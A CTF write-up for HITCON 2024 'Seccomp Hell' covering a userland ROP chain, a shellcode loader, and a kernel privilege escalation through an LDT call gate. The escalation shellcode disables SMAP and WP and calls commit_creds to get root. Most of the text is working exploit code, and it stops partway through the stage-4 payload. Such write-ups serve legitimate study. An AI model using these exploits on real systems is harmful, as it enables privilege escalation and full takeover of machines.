CTFtime.org / HITCON CTF 2024 Quals / Seccomp Hell / Writeup

# Seccomp Hell

> Some challenges are userland pwns, others are kernel pwn, still others are sandbox escapes.
In Seccomp Hell, you can get all three for free <3
>
> Note: Try getting a full root shell for this challenge
>
>
> [Dist](https://storage.googleapis.com/hitcon-ctf-2024-qual-attachment/seccomphell/seccomphell-fe8e817a92294a8810182a9c9737d83083554b61.tar.gz)

## TL;DR
You need to exploit three parts in this challenge

1. userland exploitation
backdoor that allows ROP chain that can be used to get arbitray code execution

2. kernel backdoor
backdoor that creates CALL GATE in the LDT (local descriptor table) to get kernel mode escalation and write kernel shellcode

3. sandbox escape
disable seccomp and escalate priviliges through kernel shellcode (corrupt current task_struct)

## Overview

Guessing from the challenge description there will be at least three parts
1. userland exploitation
2. kernel exploitation
3. sandbox escape (seccomp)

The challenges consists of only three files:
```txt
dist
├── bzImage
├── initramfs.cpio.gz
└── run.sh
```

a simple run.sh script
```bash
#!/bin/bash

qemu-system-x86_64 \
-cpu qemu64,+smap \
-m 4096M \
-kernel bzImage \
-initrd initramfs.cpio.gz \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
-monitor /dev/null \
-nographic \
-netdev user,id=net0,hostfwd=tcp::22222-:22222 \
-device e1000,netdev=net0 \
-no-reboot
```

On important aspect is that `+smep` (Supervisor Mode Execution Protection) protection is missing ... *forshadowing*

Also here is an explaination of the [Kernel paramters](https://docs.kernel.org/admin-guide/kernel-parameters.html):

+ console=ttyS0
console output options, nothing interesting use `context.newline = b'\r\n'`

+ loglevel=3
reduce the amount of logging, can be increased or removed for easier debugging

+ oops=panic
immediatly panic on every kernel oops, means our kernel exploit needs to be precise

+ panic=-1
immediatly reboot on kernel panic, so we can't just corrupt in another socket connection (not that we wanted to do this neccessarly either)

+ pti=on
enable Page Table Isolation (so no cpu side channel)

we can decompress the initramfs.cpio.gz file using sth similar to this [script](https://github.com/gfelber/how2keap/blob/main/scripts/decompress.sh).

Let's first look at the init script:

/init

```bash
#!/bin/sh

chown 0:0 -R /
chown 1000:1000 -R /home/user
chmod 4755 /bin/busybox

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mount -t devtmpfs none /dev
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
/sbin/mdev -s

chmod 666 /dev/ptmx

# network
insmod /usr/lib/modules/e1000.ko
ifup lo >& /dev/null
ifup eth0 >& /dev/null

# banner
cat /etc/banner

# kernel backdoor
insmod /usr/lib/modules/i_am_definitely_not_backdoor.ko
chmod 0666 /dev/i_am_definitely_not_backdoor

# user backdoor
echo 'server starting...'
setsid cttyhack setuidgid 1000 /bin/socat tcp-l:22222,reuseaddr,fork EXEC:"/home/user/i_am_not_backdoor.bin",pty,stderr

poweroff -f
```

</details>

ok we know that our vulnerable userland binary is `/home/user/i_am_not_backdoor.bin` and the vulnerable kernel module is `/usr/lib/modules/i_am_definitely_not_backdoor.ko` and accessable through `/dev/i_am_definitely_not_backdoor`

## Test Environment

I actually used two of my tools to setup my test environment
+ [vagd](https://github.com/gfelber/vagd) to exploit the userland binary
+ [how2keap](https://github.com/gfelber/how2keap) as an template for the kernel exploitation part

This is how my setup looks like

```txt
seccomp_hell
├── Makefile
├── bins
│ ├── i_am_definitely_not_backdoor.ko
│ └── i_am_not_backdoor.bin
├── exploit.py
├── libs
│ ├── pwn.h
│ ├── util.c
│ └── util.h
├── pwn.c
├── rootfs
│ ├── ...
├── scripts
│ ├── build.sh
│ ├── compress.sh
│ ├── decompress.sh
│ ├── gdbinit
│ └── start-qemu.sh
└── share
├── bzImage
├── flag.txt
├── initramfs.cpio.gz
├── rootfs.cpio.gz -> initramfs.cpio.gz
└── run.sh
```

## Userland

Lets first get some base information:

file:
```
bins/i_am_not_backdoor.bin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=f4640517119249a926c7399197447b388e07807c, for GNU/Linux 3.2.0, with debug_info, not stripped
```

checksec:
```
[*] './i_am_not_backdoor.bin'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] GCC: (Debian 13.2.0-24) 13.2.0
```

[seccomp-tools](https://github.com/david942j/seccomp-tools) dump:

```
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000000 A = sys_number
0001: 0x15 0x00 0x01 0x00000000 if (A != read) goto 0003
0002: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0003: 0x15 0x00 0x01 0x00000001 if (A != write) goto 0005
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0005: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0009
0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0009: 0x15 0x00 0x01 0x00000009 if (A != mmap) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0011: 0x15 0x00 0x01 0x0000000a if (A != mprotect) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0013: 0x15 0x00 0x01 0x00000029 if (A != socket) goto 0015
0014: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0015: 0x15 0x00 0x01 0x0000002a if (A != connect) goto 0017
0016: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0017: 0x15 0x00 0x01 0x0000009a if (A != modify_ldt) goto 0019
0018: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0019: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0021
0020: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0021: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0023
0022: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0023: 0x06 0x00 0x00 0x00000000 return KILL
```

</details>

hmm, so interesting syscalls are allowed that are important for writing a assembly payload (`mmap`, `mprotect`), it also alows us to open the vulnerable kernel module (`open`). also for some reason a syscall called `modify_ldt` is whitelisted ... *forshadowing*

### Stage 1: ROP Backdoor

At first glance the binary seems fine, but it actually corrupts the return ptr and jmps to a backdoor function using ROP:

```asm
CALL LAB_004018d1
LAB_004018d1:
ADD qword ptr [RSP]=>local_1e0,offset backdoor
PUSH RBP
MOV RBP,RSP
LEAVE
RET
```

the reversed backdoor code:
<details>

```c
#define EXAMINE_SYSCALL \
BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr)))

#define ALLOW_SYSCALL(name) \
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

#define KILL_PROCESS \
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL)

void backdoor() {

char rop[0];

read(STDIN_FILENO,rop,0x98);
close(STDIN_FILENO);
close(STDOUT_FILENO);
close(STDERR_FILENO);

struct sock_filter seccomp_filter[] = {
EXAMINE_SYSCALL,
ALLOW_SYSCALL(read),
ALLOW_SYSCALL(write),
ALLOW_SYSCALL(open),
ALLOW_SYSCALL(close),
ALLOW_SYSCALL(mmap),
ALLOW_SYSCALL(mprotect),
ALLOW_SYSCALL(socket),
ALLOW_SYSCALL(connect),
ALLOW_SYSCALL(modify_ldt), // forshadowing
ALLOW_SYSCALL(exit),
ALLOW_SYSCALL(exit_group),
KILL_PROCESS,
};

struct sock_fprog prog = {
.len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
.filter = (struct sock_filter*)&seccomp_filter,
};

assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}
```

</details>

The backdoor can be summarized like this:

1. read BOF (rop chain) using read

2. close STDIN, STDOUT and STDERR

3. setup seccomp filter whitelist

lets take a look at the opened files, before they are closed:
```
ls -l /proc/$(pidof i_am_not_backdoor.bin)/fd
lrwx------ 1 user users 64 Jul 12 17:12 0 -> /dev/pts/0
lrwx------ 1 user users 64 Jul 12 17:12 1 -> /dev/pts/0
lrwx------ 1 user users 64 Jul 12 17:12 2 -> /dev/pts/0
lrwx------ 1 user users 64 Jul 12 17:12 3 -> socket:[385]
lrwx------ 1 user users 64 Jul 12 17:12 4 -> socket:[386]
lrwx------ 1 user users 64 Jul 12 17:12 5 -> /dev/ttyS0
```

interesting, STD fds simply point to `/dev/pts/0`, so what happens if we just open it again ... we regain a working STDIN.

> Note: /dev/pts/0 increments if there are multiple consecutive connections, this was briefly a problem, while the instance spawner was temporarly replaced with a shared instance.

> Note: this approach was unintended, the intended solution opened a socket connection using the allowed socket and connect syscalls

so let's write a simple payload that reopens `/dev/pts/0` and writes a new ROP payload into a known memory address and pivot there.

Stage 1:

```python
linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b''

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2)
rop.rdi = 0x258
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)
```

</details>

### Stage 2: pivot ROP

Now that we have more controll over the rop chain, we can write a shellcode payload directly into memory, which we will need for further exploitation.

Stage 2:

```python
linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
0: std,
0x10: b'STAGE 2',
0x18: b'STAGE 3',
0x20: b'FAIL',
0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)
```

</details>

### Stage 3: loader

At this point we realized that certain characters, e.g. `\n` and `\x04` (End of Transmission) can't be send, thats why we added another loader stage, that decodes the payload and writes it into executable memory.

```python
payload = asm('int 3')
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
{shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
xor rbx, rbx
LOAD:
// get two characters (one byte)
push 0
{shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
cmp rax, 2
jl FAIL
pop rax
sub ah, 0x41
sub al, 0x41
shl al, 2
shl al, 2
shr rax, 2
shr rax, 2
mov BYTE PTR [rbx+{PAYLOAD}], al
inc rbx
cmp rbx, {PAYLOAD_LEN}
jb LOAD

// jmp to next stage
mov rax, {PAYLOAD+0x20}
jmp rax

FAIL:
{shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
int 3
"""))

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
# hex starting a 'A'
# and least significant nibble first

payload_enc = b''
for b in payload:
lo = (b & 0xf) + 0x41
hi = ((b & 0xf0) >> 4) + 0x41
payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

it()
```

</details>

This basically finishes the userland exploitation stage

## Kernel

Lets get into the interesting part the kernel. Let's reverse the backdoor.

simplified reversed backdoor:

```c
int backdoor_open(void) { return 0 }
int backdoor_read(void) { return 0 }

int backdoor_write(void) {
void* pte;
pte_t* pte_lock;

// check if ldt exists (flip flops between two addresses)
rc = follow_pte(const_pcpu_hot + 0x8f8, 0xffff880000010000,&pte,&pte_lock);
if(rc != 0)
return -EFAULT;

// map ldt page for write
char *ldt = vmap(pages,1,4, 0x8000000000000163);
if (ldt == 0)
return -EFAULT;

// corrupt ldt entry 12

ldt[0x60] = 0;
ldt[0x61] = 0;

ldt[0x65] = 0xec; // call gate
ldt[0x66] = 0xc0
ldt[0x67] = 0;

vunmap(ldt);

return 0;
}

static struct file_operations BACKDOOR_fops = {
.owner = THIS_MODULE,
.open = backdoor_open,
.read = backdoor_read,
.write = backdoor_write,
};

static struct miscdevice backdoor_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = "keap",
.fops = &keap_fops,
};

int init_module(void) {
misc_register(&backdoor_device);
return 0;
}

void cleanup_module(void)
{
misc_deregister(&backdoor_device);
}

INT backdoor_release(void)
{
return 0;
}

module_init(init_module);
module_exit(cleanup_module);
```

</details>

so this basically checks if a kernel page exists at 0xffff880000010000, and if that is the case it overwrites sth at offset 0x60. Directly calling this kernel module fails, so how do we allocate something in this page. Well this is where the foreshadowing comes into place and the mysterious syscall `modify_ldt` actually allocates into this page.

> Note: modify_ldt acutally flip flops the ldt pages between two address on every call, so we actually need to call modify_ldt twice for this to work.

So what is LDT and how does it work? LDT or Local Descriptor Table is a feature similar to GDT (Global Descriptor Table) that holds segment descriptors, that can be used to give certain memory pages additional permissons like read, write and execute, but also system functionality like call, trap and interrupt gates (e.g. interrupt gates are used for syscalls), but the system flag can't be set (on s clear) using `modify_ldt`. Additionall info can be found in the [intel bible](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf).

So lets understand a ldt entry, we can set the following options.

[include/uapi/asm/ldt.h](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/uapi/asm/ldt.h#L21)
```c
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};
```

that need to be translated into this struct.

[include/asm/desc_defs.h](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/desc_defs.h#L66):
```c
struct desc_struct {
u16 limit0;
u16 base0;
u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1;
u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));
```

using this translation function.

[include/asm/desc.h](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/desc.h#L16):
```c
static inline void fill_ldt(struct desc_struct *desc, const struct user_desc *info)
{
desc->limit0 = info->limit & 0x0ffff;

desc->base0 = (info->base_addr & 0x0000ffff);
desc->base1 = (info->base_addr & 0x00ff0000) >> 16;

desc->type = (info->read_exec_only ^ 1) << 1;
desc->type |= info->contents << 2;
/* Set the ACCESS bit so it can be mapped RO */
desc->type |= 1;

desc->s = 1;
desc->dpl = 0x3;
desc->p = info->seg_not_present ^ 1;
desc->limit1 = (info->limit & 0xf0000) >> 16;
desc->avl = info->useable;
desc->d = info->seg_32bit;
desc->g = info->limit_in_pages;

desc->base2 = (info->base_addr & 0xff000000) >> 24;
/*
* Don't allow setting of the lm bit. It would confuse
* user_64bit_mode and would get overridden by sysret anyway.
*/
desc->l = 0;
}
```

Like we mentioned we can't create a system segment (S flag is clear). So let's create an entry at offset 12 (0x60/8) and see what happens.

example:
```c
struct user_desc ldt = {
.entry_number = 12, // max 0x1ffe
.base_addr = 0x8899aabb, // 32 bits
.limit = 0xdeeff, // 20 bits
.contents=0, // 2 bits
.read_exec_only=0, // 1 bit
.seg_not_present=0, // 1 bit
.useable=0, // 1 bit
.seg_32bit=0, // 1 bit
.limit_in_pages=0, // 1 bit
};

SYSCHK(syscallt(SYS_modify_ldt, 0x11, &ldt, sizeof(ldt)));
```

before corrupt:
```
0xffff880000010060: 0x880df399aabbeeff
0xffff880000010060: 0xeeff 0xaabb 0xf399 0x880d
0xffff880000010060: 0xff 0xee 0xbb 0xaa 0x99 0xf3 0x0d 0x88

desc_struct {
.limit0 = 0xeeff
.limit1 = 0xd
.base0 = 0xaabb
.base1 = 0x88
.base2 = 0x99
.type = 0x3 (contents=0, ACCESS=1, read_exec_only=1)
.s = 1
.dpl = 3
.p = 1
.avl = 0
.l = 0
.d = 0
.g = 0
}
```

after corrupt:
```
0xffff880000010060: 0x00c0ec99aabb0000
0xffff880000010060: 0x0000 0xaabb 0xec99 0x00c0
0xffff880000010060: 0x00 0x00 0xbb 0xaa 0x99 0xec 0xc0 0x00

desc_struct {
.limit0 = 0x0
.limit1 = 0x0
.base0 = 0xaabb
.base1 = 0x00
.base2 = 0x99
.type = 0xc (contents=3, ACCESS=0, read_exec_only=0)
.s = 0
.dpl = 3
.p = 1
.avl = 0
.l = 0
.d = 1
.g = 1
}
```

So looks like the backdoor actually creates a system segment for us, let's look at the table to understand what system segment type we have

**System-Segment and Gate-Descriptor Types**:

| Type | Field||||Description| |
|-|-|-|-|-|-|-|
| Hex | 11 | 10 | 9 | 8 | 32-Bit Mode | IA-32e Mode |
| 0x0 | 0 | 0 | 0 | 0 | Reserved | Upper 8 bytes of an 16-byte descriptor |
| 0x1 | 0 | 0 | 0| 1 | 16-bit TSS (Available) | Reserved|
| 0x2 | 0 | 0 | 1 | 0 | LDT | LDT |
| 0x3 | 0 | 0 | 1 | 1 | 16-bit TSS (Busy) | Reserved|
| 0x4 | 0 | 1 | 0 | 0 | 16-bit Call Gate | Reserved|
| 0x5 | 0 | 1 | 0 | 1 | Task Gate | Reserved|
| 0x6 | 0 | 1 | 1 | 0 | 16-bit Interrupt Gate | Reserved|
| 0x7 | 0 | 1 | 1 | 1 | 16-bit Trap Gate | Reserved|
| 0x8 | 1 | 0 | 0 | 0 | Reserved | Reserved|
| 0x9 | 1 | 0 | 0 | 1 | 32-bit TSS (Available) | 64-bit TSS (Available)|
| 0xa | 1 | 0 | 1 | 0 | Reserved | Reserved|
| 0xb | 1 | 0 | 1 | 1 | 32-bit TSS (Busy) | 64-bit TSS (Busy)|
| **0xc** | **1** | **1** | **0** | **0** | 32-bit Call Gate| **64-bit Call Gate**|
| 0xd | 1 | 1 | 0 | 1 | Reserved | Reserved|
| 0xe | 1 | 1 | 1 | 0 | 32-bit Interrupt Gate | 64-bit Interrupt Gate|
| 0xf | 1 | 1 | 1 | 1 | 32-bit Trap Gate | 64-bit Trap Gate|

And the backdoor created a 64-bit Call Gate for us.

#### Stage 4: kernel backdoor, LDT call gate

A Call gate is a x86 feature that allows switching between privilige levels similar to syscalls (interrupt gates).

After realizing this we actually found this [super cool writeup](https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/) from hlt about his challenge one_byte from hxp 2022. That talks about using call gates to disable smap to get CPL 0 (ring 0) code execution.

> Note: this wouldn't work if smep was enabled, because you can't temporarly disable smep without direct access to CR4 afaik

and with a few adjustions we can create a privilige escalation PoC:
<details>

diff from one_byte solution:
```diff
1c1,2
< // gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
---
> // gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn
>
91,94d91
< #define PERCPU_CURRENT 0x1fbc0
< #define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78
< #define STRUCT_TASK_STRUCT_CRED 0x0a80
< #define STRUCT_CRED_USAGE 0x0
96c93,97
< // TODO: Check that &ring0 == 0x401000
---
> #define COMMIT_CREDS 0xfc820
> #define PREPARE_CREDS 0xfccd0
>
>
> // TODO: Check that &ring0 == 0xc00000
136,142c137,155
< // Set current->cred and current->real_cred to init_task->cred
< addq $KASLR_INIT_TASK, %rdx
< movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
< addl $2, STRUCT_CRED_USAGE(%rdx)
< movq %gs:PERCPU_CURRENT, %rax
< movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
< movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
---
> // get .text base
> subq $(KASLR_WRITE_TO+0x400000), %rdi
> andq $(~0xfffff), %rdi
> movq %rdi, %r15
>
> // privilige escalation
> // crpt_cred = prepare_cred();
>
> lea PREPARE_CREDS(%r15), %rax
> call *%rax
>
> // crpt_cred.uid = 0;
> // crpt_cred.gid = 0;
> movq %rax, %rdi
> movq $0, 8(%rdi)
>
> // commit_creds(crpt_cred);
> lea COMMIT_CREDS(%r15), %rax
> call *%rax
204c217
< asciz module_path, "/dev/one_byte"
---
> asciz module_path, "/dev/i_am_definitely_not_backdoor"
256c269,270
< exit_64 $0
---
> movq $0, %rdi
> check_syscall_64 $SYS_exit
258a273
>
```

privilige escalation PoC:
```asm
// gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn

#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
.code64
__syscall_64_fail.L:
negl %eax
movl $SYS_exit_group, %eax
syscall
ud2
.popsection

.macro check_syscall_64 nr:req, res=%rax
movl \nr, %eax
syscall
test \res, \res
js __syscall_64_fail.L
.endm

.macro var name:req
.pushsection .data
.balign 8
.local \name
\name:
.endm

.macro endvar name:req
.local end_\name
end_\name:
.eqv sizeof_\name, end_\name - \name
.popsection
.endm

.macro asciz name:req, data:vararg
var \name
.asciz \data
endvar \name
.endm

.macro far_ptr name:req, selector:req, offset:req
var \name
.int \offset
.short \selector
endvar \name
.endm

.macro fn name:req
.text
.code64
.global \name
\name:
.endm

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL 0b000
#define RPL_USER 0b011
#define TARGET_ENTRY 12
#define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER)

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
// 0x0000000000401000 <- ring0
// 0x00000000ffdfffff
// |||\___/
// ||| \____ limit
// \/\_______ G, D, 0, AV
// \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define COMMIT_CREDS 0xfc820
#define PREPARE_CREDS 0xfccd0

// TODO: Check that &ring0 == 0xc00000
fn ring0
// Disable interrupts (interrupts cause double faults right now)
cli

// Read LSTAR to bypass KASLR
movl $MSR_LSTAR, %ecx
rdmsr
shlq $32, %rdx
orq %rax, %rdx
subq $KASLR_LSTAR, %rdx
movq %rdx, %rbp

// Disable WP
movq %cr0, %r8
andq $(~(1 << 16)), %r8
movq %r8, %cr0

// Copy stage 2 to the mapped kernel entry point
movq %rbp, %rdi
addq $KASLR_WRITE_TO, %rdi
movq %rdi, %r15
leaq ring0_stage2(%rip), %rsi
movl $sizeof_ring0_stage2, %ecx
rep movsb

// Jump there.
jmp *%r15

var ring0_stage2
// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq %cr3, %rbx

// Switch to the kernel page table.
andq $(~PTI_SWITCH_MASK), %rbx
movq %rbx, %cr3

// get .text base
subq $(KASLR_WRITE_TO+0x400000), %rdi
andq $(~0xfffff), %rdi
movq %rdi, %r15

// privilige escalation
// crpt_cred = prepare_cred();

lea PREPARE_CREDS(%r15), %rax
call *%rax

// crpt_cred.uid = 0;
// crpt_cred.gid = 0;
movq %rax, %rdi
movq $0, 8(%rdi)

// commit_creds(crpt_cred);
lea COMMIT_CREDS(%r15), %rax
call *%rax

// Swap back
swapgs

// Switch the page table back around
orq $PTI_SWITCH_MASK, %rbx
movq %rbx, %cr3

// Build an `iret` stackframe rather than a `ret far` stack frame.
popq %r8 // => %rip
popq %r9 // => %cs
pushfq
orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
pushq %r9
pushq %r8
iretq
endvar ring0_stage2

var user_desc
// base2 (base_addr[31:24]) == cs_offset[31:24]
// limit_in_pages == cs_offset[23]
// seg_32bit == cs_offset[22]
// NB: Because lm is ignored, cs_offset[21] must be 0
// useable == cs_offset[20]
// limit1 (limit[19:16]) == cs_offset[19:16]
// flags0 == (arbitrary, will be overwritten later)
// base1 (base_addr[23:16]) == (ignored entirely)
// base0 (base_addr[15:0]) == __KERNEL_CS
// limit0 (limit[15:0]) == cs_offset[15:0]
.int TARGET_ENTRY // entry_number
.int __KERNEL_CS // base_addr
.int 0x01000 // limit
.int 0b00000001 // flags (int because of padding - only the low byte is actually used)
// |||||\/\____ .seg_32bit (D) (must be 1 for set_thread_area)
// ||||| \_____ .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
// ||||\_______ .read_exec_only (!R)
// |||\________ .limit_in_pages (G)
// ||\_________ .seg_not_present (!P)
// |\__________ .useable (AV)
// \___________ .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
// base2 (base_addr[31:24]) == (ignored)
// flags1 == (ignored)
// limit1 (limit[19:16]) == (ignored)
// flags0 == (mostly ignored, except for the type)
// base1 (base_addr[23:16]) == (ignored)
// base0 (base_addr[15:0]) == cs_offset[63:48]
// limit0 (limit[15:0]) == cs_offset[47:32]

var high_desc
// We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
// above the target descriptor).
.int TARGET_ENTRY + 2 // entry_number
.int 0xffff // base_addr
.int 0xffff // limit
.int 0b00111000 // flags
endvar high_desc

asciz module_path, "/dev/i_am_definitely_not_backdoor"
asciz shell_path, "/bin/sh"

var shell_argv
.quad shell_path
.quad 0
endvar shell_argv

var module_message
.quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5
.byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
movl $sizeof_\desc, %edx
leaq \desc(%rip), %rsi
movl $0x11, %edi
check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.
.endm

fn _start
// Open device
xorl %edx, %edx
movl $O_WRONLY, %esi
leaq module_path(%rip), %rdi
check_syscall_64 $SYS_open
movl %eax, %r15d

// "stac" in CPL3
pushfq
orq $(1 << 18), (%rsp)
popfq

// Update the LDT
modify_ldt user_desc
modify_ldt high_desc

// Trigger the overwrite
movl $sizeof_module_message, %edx
leaq module_message(%rip), %rsi
movl %r15d, %edi
check_syscall_64 $SYS_write

// Go to CPL 0
far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
lcall *(gate_target)

// Get a shell
leaq shell_path(%rip), %rdi
leaq shell_argv(%rip), %rsi
xorl %edx, %edx
check_syscall_64 $SYS_execve
movq $0, %rdi
check_syscall_64 $SYS_exit

// vim:syntax=asm:
```

</details>

so let's rewrite this into a python payload.

Stage 4:

```python
trampolin = asm('int 3')

far_func = p64(0x67dead8664)

payload = bytearray(far_func+seccomp+asm(f"""
{shc.echo("STAGE 4")}

{shc.echo("[+] INIT\n")}

{shc.pushstr("/dev/i_am_definitely_not_backdoor")}
{shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
cmp rax, 0
jl FAIL

mov rbx, rax
{shc.echo("[+] backdoor fd: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

{shc.echo("\n[+] START\n")}

// disable SMAP
{shc.echo("[+] 'stac' in CPL3\n")}
pushfq
or QWORD PTR [rsp],0x40000
popfq

{shc.echo("[+] modify_ldt user\n")}
mov rax, 0x100001000
push rax
mov rax, 0x100000000c
push rax
mov rsi, rsp

mov edx,0x10
mov edi,0x11
mov eax,{cst.SYS_modify_ldt}
syscall
cmp rax, 0
jl FAIL

{shc.echo("[+] modify_ldt high\n")}

mov rax, 0x380000FFFF
push rax
mov rax, 0xFFFF0000000E
push rax
mov rsi, rsp

mov edx,0x10
mov edi,0x11
mov eax,{cst.SYS_modify_ldt}

syscall
cmp rax, 0
jl FAIL

{shc.echo("[+] write to backdoor\n")}
{shc.pushstr('TEST')}
mov rsi, rsp
{shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
cmp rax, 0
